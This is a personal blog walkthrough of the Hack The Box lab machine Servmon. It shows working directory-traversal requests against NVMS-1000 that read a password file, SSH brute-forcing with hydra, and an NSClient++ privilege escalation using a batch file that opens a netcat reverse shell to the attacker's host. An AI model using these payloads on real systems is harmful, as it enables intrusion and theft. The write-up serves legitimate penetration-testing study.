Servmon is a recently retired box (11 Apr – 20 Jun) and though marked Easy it didn’t feel as easy as earlier Windows boxes, largely because of power creep; boxes become more difficult over time while retaining the same difficulty rating. The other problem was how unstable the box was; for some reason some ports weren’t marked open even though they should be. I found this only after I checked online and saw others encountered the same problem. Without those running services, the box is unexploitable. Fortunately after I switched regions I could find those running services and proceed.
When doing this box you may find that Chromium loads quicker than Firefox on Kali, so I installed it.
Lessons learned
- (Unintended) differences between HTB regions for the same box
- amap being too old to reliably trust
- Post-exploitation enumeration restrictions on recent Windows builds
- Dealing with Windows AV for file-transfer
Enumeration
This was what I saw in the first region
root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-29 16:46:51 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 49667/tcp on 10.10.10.184 Discovered open port 135/tcp on 10.10.10.184 Discovered open port 445/tcp on 10.10.10.184 Discovered open port 5040/tcp on 10.10.10.184 Discovered open port 49666/tcp on 10.10.10.184 Discovered open port 49668/tcp on 10.10.10.184 Discovered open port 5666/tcp on 10.10.10.184 Discovered open port 7680/tcp on 10.10.10.184 Discovered open port 49665/tcp on 10.10.10.184 Discovered open port 21/tcp on 10.10.10.184 Discovered open port 49664/tcp on 10.10.10.184 Discovered open port 49669/tcp on 10.10.10.184 Discovered open port 8443/tcp on 10.10.10.184 Discovered open port 22/tcp on 10.10.10.184 Discovered open port 49670/tcp on 10.10.10.184
After switching regions, port 80 appears.
root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-30 06:26:37 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 7680/tcp on 10.10.10.184 Discovered open port 49667/tcp on 10.10.10.184 Discovered open port 49669/tcp on 10.10.10.184 Discovered open port 49670/tcp on 10.10.10.184 Discovered open port 5666/tcp on 10.10.10.184 Discovered open port 8443/tcp on 10.10.10.184 Discovered open port 445/tcp on 10.10.10.184 Discovered open port 80/tcp on 10.10.10.184 Discovered open port 139/tcp on 10.10.10.184 Discovered open port 49664/tcp on 10.10.10.184 Discovered open port 49668/tcp on 10.10.10.184 Discovered open port 135/tcp on 10.10.10.184 Discovered open port 49665/tcp on 10.10.10.184 Discovered open port 21/tcp on 10.10.10.184 Discovered open port 22/tcp on 10.10.10.184 Discovered open port 5040/tcp on 10.10.10.184 Discovered open port 6063/tcp on 10.10.10.184 Discovered open port 49666/tcp on 10.10.10.184 Discovered open port 6699/tcp on 10.10.10.184
I spent a lot of time applying the right exploits to the wrong port only to discover this. The running services and ports are here.
FTP
We see an FTP server running, so run nmap’s FTP scripts against it.
root@Kali:~/HTB/Servmon# nmap -Pn -n -sV -p21 --script=ftp* 10.10.10.184 -e tun0 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 01:14 +08 NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument. Nmap scan report for 10.10.10.184 Host is up (0.0053s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM Users | ftp-brute: | Accounts: No valid accounts found |_ Statistics: Performed 50009 guesses in 93 seconds, average tps: 537.1 | ftp-syst: |_ SYST: Windows_NT Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 93.50 seconds
This tells us anonymous access is allowed. So I logged in, found some notes and downloaded them.
root@Kali:~/HTB/Servmon# ftp -p 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> pwd 257 "/" is current directory. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,11). 125 Data connection already open; Transfer starting. 01-18-20 12:05PM Users 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,12). 125 Data connection already open; Transfer starting. 01-18-20 12:06PM Nadine 01-18-20 12:08PM Nathan 226 Transfer complete. ftp> cd Nadine 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,15). 125 Data connection already open; Transfer starting. 01-18-20 12:08PM 174 Confidential.txt 226 Transfer complete. ftp> mget Confidential.txt mget Confidential.txt? Y 227 Entering Passive Mode (10,10,10,184,194,20). 125 Data connection already open; Transfer starting. 226 Transfer complete. 174 bytes received in 0.00 secs (35.9851 kB/s) ftp> cd .. 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,21). 125 Data connection already open; Transfer starting. 01-18-20 12:06PM Nadine 01-18-20 12:08PM Nathan 226 Transfer complete. ftp> cd Nathan 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,22). 125 Data connection already open; Transfer starting. 01-18-20 12:10PM 186 Notes to do.txt 226 Transfer complete. ftp> mget "Notes to do.txt" mget Notes to do.txt? Y 227 Entering Passive Mode (10,10,10,184,194,24). 125 Data connection already open; Transfer starting. 226 Transfer complete.
Apart from these I also tested if I could do directory traversal cd ../../../../, nope didn’t work. The notes read (with added newlines)
root@Kali:~/HTB/Servmon# cat Confidential.txt Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine root@Kali:~/HTB/Servmon# cat 'Notes to do.txt' 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
Ok so we know a few things. First there’s a Passwords.txt on Nathan’s desktop which we can’t get to with anonymous FTP (I tried dir -a). Then we see references to NVMS and NSClient, a clue on what software may be running.
SMB
Couldn’t find anything here. No null sessions were available. Afternote: When I was done with the box and watched IppSec’s video he shows that the discovered passswords worked with SMB.
root@Kali:~/HTB/Servmon# smbmap -H 10.10.10.184
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.184
root@Kali:~/HTB/Servmon# smbclient --no-pass -L //10.10.10.184
WARNING: The "syslog" option is deprecated
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_ACCESS_DENIED
Web services
Port 8443
I tried 8443 first (since I didn’t discover 80 until later) and found that amap (which was pretty old) didn’t identify this Web service properly
root@Kali:~/HTB/Servmon# amap 10.10.10.184 8443 amap v5.4 (www.thc.org/thc-amap) started at 2020-08-30 01:34:25 - APPLICATION MAPPING mode Unidentified ports: 10.10.10.184:8443/tcp (total 1). amap v5.4 finished at 2020-08-30 01:34:31 root@Kali:~/HTB/Servmon# curl http://10.10.10.184:8443/ curl: (56) Recv failure: Connection reset by peer
Nor did curl get redirected to the HTTPS website. But if you enter explicitly https://10.10.10.184:8443 you’ll see this
Strangely there’s no username required and I tried some obvious passwords like nadine, nathan, servmon, admin, password etc. none which worked. Googling NSClient tells us its a monitoring agent which fits the name Servmon pretty well. I couldn’t find any default passwords to use for NSClient either. searchsploit returns this
root@Kali:~/HTB/Servmon# searchsploit nsclient -------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- --------------------------------- NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | json/webapps/48360.txt NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt -------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
But neither appears relevant; we don’t have creds nor are we already in. dirbuster hung when I tried, and anyway it didn’t find much.
Port 80
Page loaded this
Similarly we don’t have any passwords and in any case, Nathan’s note says they’ve been changed. searchsploit returned something interesting
root@Kali:~/HTB/Servmon# searchsploit nvms -------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- --------------------------------- NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py -------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
The last result, a Python exploit was published a day after the box was released. So it’s probably not right to use it, since it would have been written just for the box. It seemed to be an automated exploit of the first result though. We can try this in Burp repeater
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: dataPort=6063 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Content-type: Content-Length: 92 Connection: close AuthInfo: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
Ok we managed to do an LFI on Windows. Now what would be interesting is what we could view. Nadine’s note says that Passwords.txt was on Nathans desktop.
GET /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: dataPort=6063 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Content-type: text/plain Content-Length: 156 Connection: close AuthInfo: 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
We got a bunch of passwords. I tried them with NSClient login, but none succeeded. Now although not necessary at this stage, I had a look at the earlier privilege escalation exploit for NSClient and it says the Web administrator password is at c:\program files\nsclient++\nsclient.ini. So I used the LFI vulnerability to view it. We can see the password, but also understand why it returned a 403 not allowed error instead, namely because only localhost can login.
; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1
Exploitation – SSH login
We still have SSH to test. This is an odd service running on Windows, but anyway. We have two usernames and a list of passwords so let’s use hydra to bruteforce SSH logins, hopefully it doesn’t lock us out.
root@Kali:~/HTB/Servmon# cat users.txt Nadine Nathan root@Kali:~/HTB/Servmon# cat Passwords.txt 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ root@Kali:~/HTB/Servmon# hydra -L users.txt -P Passwords.txt 10.10.10.184 -t 4 ssh Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-30 17:53:59 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14 login tries (l:2/p:7), ~4 tries per task [DATA] attacking ssh://10.10.10.184:22/ [22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-30 17:54:03 root@Kali:~/HTB/Servmon# ssh nadine@10.10.10.184 nadine@10.10.10.184's password: Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>
Great we’re in. Getting winPEAS to run was quite a headache. I found quickly that commands like systeminfo, tasklist were blocked
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist ERROR: Access denied
which is something increasingly true of newer Windows boxes. Ok let’s check the .NET version
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir C:\Windows\Microsoft.NET\Framework
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Windows\Microsoft.NET\Framework
19/03/2019 05:52 <DIR> .
19/03/2019 05:52 <DIR> ..
19/03/2019 05:46 7,680 sbscmp10.dll
19/03/2019 05:46 7,680 sbscmp20_mscorwks.dll
19/03/2019 05:46 7,680 sbscmp20_perfcounter.dll
19/03/2019 05:46 7,680 sbs_diasymreader.dll
19/03/2019 05:46 7,680 sbs_microsoft.jscript.dll
19/03/2019 05:46 7,680 sbs_mscordbi.dll
19/03/2019 05:46 7,680 sbs_mscorrc.dll
19/03/2019 05:46 7,680 sbs_mscorsec.dll
19/03/2019 05:46 7,680 sbs_system.configuration.install.dll
19/03/2019 05:46 7,680 sbs_system.data.dll
19/03/2019 05:46 7,680 sbs_system.enterpriseservices.dll
19/03/2019 05:46 7,680 sbs_wminet_utils.dll
19/03/2019 05:46 7,680 SharedReg12.dll
08/04/2020 23:21 <DIR> v1.0.3705
08/04/2020 23:21 <DIR> v1.1.4322
19/03/2019 05:52 <DIR> v2.0.50727
30/08/2020 07:36 <DIR> v4.0.30319
13 File(s) 99,840 bytes
6 Dir(s) 27,495,735,296 bytes free
4.0 so we have to use an older compiled winPEAS (current requires 4.5). Here I encountered a bunch of problems I couldn’t download winPEAS with certutil or transfer with smbserver.py because Windows antivirus blocked it. What worked was what I discovered with Anthem here, namely that FTP download.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ftp ftp> open 10.10.14.18 Connected to 10.10.14.18. 220 pyftpdlib 1.2.0 ready. 530 Log in with USER and PASS first. User (10.10.14.18:(none)): anonymous 331 Username ok, send password. Password: 230 Login successful. ftp> GET winPEASany.exe 200 Active data connection established. 125 Data connection already open. Transfer starting. 226 Transfer complete. ftp: 237698 bytes received in 0.66Seconds 358.52Kbytes/sec. ftp> quit 221 Goodbye.
On Kali run the FTP server
root@Kali:~/HTB/Servmon# python -m pyftpdlib -p 21 -w /usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:262: RuntimeWarning: write permissions assigned to anonymous user. RuntimeWarning) [I 20-08-30 18:31:15] >>> starting FTP server on 0.0.0.0:21, pid=18441 <<< [I 20-08-30 18:31:15] poller: [I 20-08-30 18:31:15] masquerade (NAT) address: None [I 20-08-30 18:31:15] passive ports: None [I 20-08-30 18:31:15] use sendfile(2): True [I 20-08-30 18:31:45] 10.10.10.184:49721-[] FTP session opened (connect) [I 20-08-30 18:31:55] 10.10.10.184:49721-[anonymous] USER 'anonymous' logged in. [I 20-08-30 18:32:20] 10.10.10.184:49721-[anonymous] RETR /root/HTB/Servmon/winPEASany.exe completed=1 bytes=237698 seconds=0.694 [I 20-08-30 18:32:26] 10.10.10.184:49721-[anonymous] FTP session closed (disconnect).
Here as SSH provides an interactive shell, we can use FTP directly, otherwise in an non-interactive remote shell we can do what was done in Anthem, namely putting all the commands in one txt file and running FTP on that. Once I found a way to download files to the box, I hunted for a version of winPEAS which worked. The non-functional ones returned this error
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEASx64.exe cmd > winpeas.txt This version of C:\Users\Nadine\AppData\Local\Temp\winPEASx64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
Tried a few more, this ended up working.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEAS.exe cmd > winpeas.txt
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine\AppData\Local\Temp
30/08/2020 11:37 <DIR> .
30/08/2020 11:37 <DIR> ..
30/08/2020 11:24 59,392 nc.exe
30/08/2020 11:37 231,424 winPEAS.exe
30/08/2020 11:38 144,095 winpeas.txt
30/08/2020 11:32 237,698 winPEASany.exe
30/08/2020 11:35 237,186 winPEASx64.exe
5 File(s) 909,795 bytes
2 Dir(s) 27,495,587,840 bytes free
Other file transfer methods
I tested other file transfer methods, findings here. In conclusion, stick with Powershell’s DownloadFile method, FTP and scp (if Windows OpenSSH is installed). Unfortuntely winPEAS was quite uninformative this time round, it didn’t highlight any potentially exploitable vector. If you paid really close attention to non-Microsoft services you might see this
NSClient++ Monitoring Agent(MySolutions Nordic (Michael Medin) - NSClient++ Monitoring Agent)["C:\Program Files\NSClient++\nscp.exe" service --run
--name nscp] - Autoload
Monitoring agent for nagios (and others) used to respond to status queries
Restricted enumeration
But in general winPEAS had a hard time because the way it lists services is via Powershell’s Get-Service:
nadine@SERVMON C:\Users\Nadine\Downloads>powershell.exe "Get-Service"
Get-Service : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ Get-Service
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-Service], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand
on winPEAS we see
[X] Exception: Access denied System.InvalidOperationException: Cannot open Service Control Manager on computer '.'. This operation might require other privileges. ---> System.ComponentModel.Win32Exception: Access is denied --- End of inner exception stack trace --- at System.ServiceProcess.ServiceController.GetDataBaseHandleWithAccess(String machineName, Int32 serviceControlManaqerAccess) at System.ServiceProcess.ServiceController.GetDataBaseHandleWithEnumerateAccess(String machineName) at System.ServiceProcess.ServiceController.GetServicesOfType(String machineName, Int32 serviceType) at System.ServiceProcess.ServiceController.GetServices() at d5.c(Dictionary`2 A_0) at d4.bs()
Commands like systeminfo, tasklist are restricted as well.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist ERROR: Access denied
But some are working on PS, such as Get-Process
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>Powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\Nadine\AppData\Local\Temp>
PS C:\Users\Nadine\AppData\Local\Temp> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
443 25 14560 31028 6252 1 ApplicationFrameHost
269 13 2464 13444 6704 1 browser_broker
89 5 2884 4688 0.48 604 0 cmd
107 6 2572 4424 0.06 4332 0 cmd
152 10 6728 12708 0.13 6376 0 conhost
157 10 6700 13004 7728 0 conhost
110 6 1300 5236 3.70 7956 0 conhost
619 21 1752 5196 408 0 csrss
400 17 1612 4756 496 1 csrss
386 15 3740 13764 4616 1 ctfmon
256 14 3924 13264 3564 0 dllhost
789 40 37732 71228 976 1 dwm
1649 62 24492 93060 5620 1 explorer
32 7 3404 7656 740 1 fontdrvhost
32 5 1340 3760 748 0 fontdrvhost
0 0 60 8 0 0 Idle
1157 23 5220 15528 636 0 lsass
173 15 4224 11460 2752 0 ManagementAgentHost
0 0 160 10412 1536 0 Memory Compression
760 45 39012 28220 7464 1 Microsoft.Photos
835 45 20068 72432 6328 1 MicrosoftEdge
488 20 5808 25280 7044 1 MicrosoftEdgeCP
263 13 3832 13000 5328 1 MicrosoftEdgeSH
221 13 2828 9972 4644 0 msdtc
739 71 177420 186952 2776 0 MsMpEng
137 9 1148 8748 0.16 3156 0 nc
192 33 3392 9264 4400 0 NisSrv
352 23 7348 19484 2660 0 nscp
2526 357 347536 118644 8080 1 NVMS-1000
624 34 96216 108592 4.31 7604 0 powershell
0 15 4572 26712 88 0 Registry
289 17 5416 21996 988 1 RuntimeBroker
126 8 1516 7408 1564 1 RuntimeBroker
133 9 1624 8128 2628 1 RuntimeBroker
407 19 6212 21204 2764 1 RuntimeBroker
215 11 2500 16016 6160 1 RuntimeBroker
139 8 1528 7400 6932 1 RuntimeBroker
269 14 2984 15296 7340 1 RuntimeBroker
255 16 4860 16324 8136 1 RuntimeBroker
776 43 19960 28332 2740 0 SearchIndexer
1072 68 71472 135400 4088 1 SearchUI
226 11 2736 14996 4224 1 SecurityHealthHost
410 16 4140 15512 6108 0 SecurityHealthService
154 10 1704 8828 7812 1 SecurityHealthSystray
641 11 4952 9592 628 0 services
89 6 3192 5964 3644 0 SgrmBroker
574 26 10664 45388 6440 1 ShellExperienceHost
555 18 6096 24768 3232 1 sihost
53 3 1148 1036 312 0 smss
422 21 5108 14748 2076 0 spoolsv
109 12 1712 6788 2688 0 sshd
120 9 2136 7044 0.89 6872 0 sshd
113 9 2040 7180 7716 0 sshd
588 27 18200 58148 648 1 StartMenuExperienceHost
157 7 1404 5704 332 0 svchost
287 13 3188 10832 340 0 svchost
158 10 1940 12136 596 0 svchost
214 12 2156 10040 660 0 svchost
86 5 908 3752 756 0 svchost
1169 22 11628 28836 828 0 svchost
1116 17 7048 14252 880 0 svchost
249 10 2172 7892 924 0 svchost
198 12 2184 12136 968 0 svchost
485 28 9328 19108 1032 0 svchost
415 14 13888 16632 1088 0 svchost
127 8 1412 7092 1152 0 svchost
138 19 3848 7796 1176 0 svchost
206 12 1692 7324 1192 0 svchost
219 10 2104 7244 1228 0 svchost
175 7 1248 5588 1352 0 svchost
226 13 2584 11784 1360 0 svchost
438 9 2900 8932 1368 0 svchost
242 12 34076 41512 1376 0 svchost
389 17 5640 15172 1468 0 svchost
367 15 4260 11828 1576 0 svchost
177 11 1864 8292 1600 0 svchost
267 13 2860 7740 1620 0 svchost
144 9 1516 6996 1708 0 svchost
175 10 1948 8064 1728 0 svchost
363 10 2584 8448 1840 0 svchost
211 10 1972 8532 1872 0 svchost
274 16 5564 19500 1884 0 svchost
190 15 6088 9844 1912 0 svchost
258 11 2576 9948 1944 0 svchost
126 10 1540 6252 1956 0 svchost
358 14 2268 9444 1968 0 svchost
225 12 2256 10916 2088 0 svchost
166 9 1772 6992 2124 0 svchost
428 32 9780 18908 2140 0 svchost
187 11 1984 8056 2196 0 svchost
263 13 2604 7700 2392 0 svchost
166 12 1660 7172 2400 0 svchost
203 23 2696 10092 2516 0 svchost
443 22 13944 28348 2524 0 svchost
344 21 27292 32352 2536 0 svchost
336 15 4524 11796 2556 0 svchost
421 16 8440 18568 2576 0 svchost
286 13 3748 15648 2640 1 svchost
209 12 2392 8768 2652 0 svchost
135 9 1552 6380 2672 0 svchost
128 7 1272 5344 2716 0 svchost
241 12 3128 17128 2804 0 svchost
483 18 3500 12724 2876 0 svchost
136 8 1584 6004 2896 0 svchost
378 23 3280 12000 3148 0 svchost
293 17 4192 15044 3256 0 svchost
307 18 4976 16596 3544 0 svchost
389 19 6600 39044 4104 1 svchost
253 13 3116 14520 4292 0 svchost
180 9 4532 12580 4480 0 svchost
169 9 1740 7836 4508 0 svchost
222 13 2880 12304 4528 0 svchost
340 42 4808 15808 4840 0 svchost
218 15 1968 7152 5132 0 svchost
241 12 3012 16132 5672 1 svchost
399 67 14716 20248 5812 0 svchost
190 12 2744 14848 6216 0 svchost
239 13 2852 11952 7120 0 svchost
227 12 2520 9732 7436 0 svchost
454 25 5024 20116 7524 1 svchost
188 10 3192 7660 7896 0 svchost
120 7 1324 5672 8004 0 svchost
2565 0 196 64 4 0 System
794 36 18324 660 2244 1 SystemSettings
260 27 4904 13796 4204 1 taskhostw
269 17 5104 14644 5488 1 taskhostw
483 21 33228 51996 7748 0 usocoreworker
178 13 4816 12924 2744 0 VGAuthService
407 24 9524 21840 2816 0 vmtoolsd
279 20 4300 16660 7880 1 vmtoolsd
129 9 1292 6780 5912 1 WatchDog
156 11 1312 6496 484 0 wininit
271 13 2908 12924 568 1 winlogon
524 36 15064 396 5908 1 WinStore.App
152 9 1564 7604 3528 0 WmiApSrv
345 16 9744 18636 3844 0 WmiPrvSE
463 24 12024 5360 7152 1 YourPhone
240 13 3304 14496 4328 1 YourPhoneServer
winPEAS also highlights that nadine’s Powershell history file is readable, which actually tells us how to escalate privileges (well in hindsight).
Priv esc
Priv esc for this box was quite tough, largely because the exploit write-up was quite difficult to follow (no screenshots or explanation of what was done). Plus, if you read this comment on IppSec’s video by the creator of the box he says that the intended route was actually through some RESTful API call, without even needing to login to NSClient. Nevertheless IppSec shows how to do it, and this is my summary:
As per the searchsploit results, read through the exploit. We first need to make NSClient Web app accessible. Noting from the config of nsclient.ini that only 127.0.0.1 is allowed to log in, we need to remote port forward this back to Kali’s ports which in effect makes the target service believe we are accessing the service on localhost rather than remotely.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ssh -l root -R 8443:127.0.0.1:8443 root@10.10.14.18 The authenticity of host '10.10.14.18 (10.10.14.18)' can't be established. ECDSA key fingerprint is SHA256:HRvXIeB7FuR8syEm3D1KDRx6s3O7n4jJQmXw4ald9PA. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.10.14.18' (ECDSA) to the list of known hosts. root@10.10.14.18's password: Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64 The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. No mail. Last login: Sun Aug 30 13:15:05 2020 from 192.168.92.1 root@Kali:~#
Then we can run the browser (Chromium works better than Firefox here).
root@Kali:~/HTB/Servmon# chromium --no-sandbox
Navigate to https://localhost:8443 on Kali (note the HTTPS), and login with the password from nsclient.ini (ew2x6SsGTxjRwXOT)
Go to settings -> external scripts -> scripts -> Add new
The “key” field needs to be command and the value needs to be a path to an executable or batch script serving as the payload. In this case we can create a simple.bat file with this (download nc.exe to the target)
nadine@SERVMON C:\Users\Nadine\Downloads>echo @echo off > evil.bat nadine@SERVMON C:\Users\Nadine\Downloads>echo C:\Users\Nadine\Downloads\nc.exe 10.10.14.18 443 -e cmd.exe >> evil.bat nadine@SERVMON C:\Users\Nadine\Downloads>type evil.bat @echo off C:\Users\Nadine\Downloads\nc.exe 10.10.14.27 443 -e cmd.exe
IppSec explains in his video that the fields Key, Value are basically a new key, value for each entry for external scripts. For example in the default script
we see these blank fields
Adding key=command, value=C:\path\to\evil.bat results in a new field with command=C:\path\to\evil.bat
Once done it is necessary to reload the NSClient service. One can do it with the Web GUI
or cmd
nadine@SERVMON C:\Users\Nadine\Downloads>sc stop nscp
SERVICE_NAME: nscp
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
nadine@SERVMON C:\Users\Nadine\Downloads>sc query nscp
SERVICE_NAME: nscp
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
nadine@SERVMON C:\Users\Nadine\Downloads>sc start nscp
SERVICE_NAME: nscp
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0xbb8
PID : 6324
FLAGS :
Strangely when I attempted to restart/stop the service the way the documentation intended it couldn’t work
nadine@SERVMON C:\Program Files\NSClient++>nscp service --stop ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied. nadine@SERVMON C:\Program Files\NSClient++>nscp service --restart ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied. ERROR: Service failed to start: OpenSCManager failed: 5: Access is denied.
Hopefully the service will not hang when restarted. When done, go to Queries and you’ll see that your script is there (default may not be present)
click on it then go to the Run tab
When you run it, you’ll get a SYSTEM shell if you have a listener up and running
root@Kali:~/HTB/Servmon# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.184] 54975
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami & ipconfig
whoami & ipconfig
nt authority\system
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::f00a:6ae5:a0c:f944
Temporary IPv6 Address. . . . . . : dead:beef::519b:a6b9:e1fd:4b16
Link-local IPv6 Address . . . . . : fe80::f00a:6ae5:a0c:f944%3
IPv4 Address. . . . . . . . . . . : 10.10.10.184
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9078%3
10.10.10.2
C:\Program Files\NSClient++>
Upload evil.bat via API
If you find the above too confusing (because the Web GUI sucks), you’re not alone. The upload can be done with the API calls. I did it this way
root@Kali:~/HTB/Servmon# cat evil.bat @echo off C:\Users\Nadine\Downloads\nc.exe 10.10.14.40 443 -e cmd.exe root@Kali:~/HTB/Servmon# curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat Enter host password for user 'admin': Added evil as scripts\evil.bat
Unfortunately I couldn’t find a way to trigger the script via API, even though there’s a command execute API so here yo have to login and you’ll see this in Queries
I didn’t have to add to scheduler or anything, and clicking Queries should run the .bat file, if not clicking its entry under Queries should.
Ivan's IT learning blog 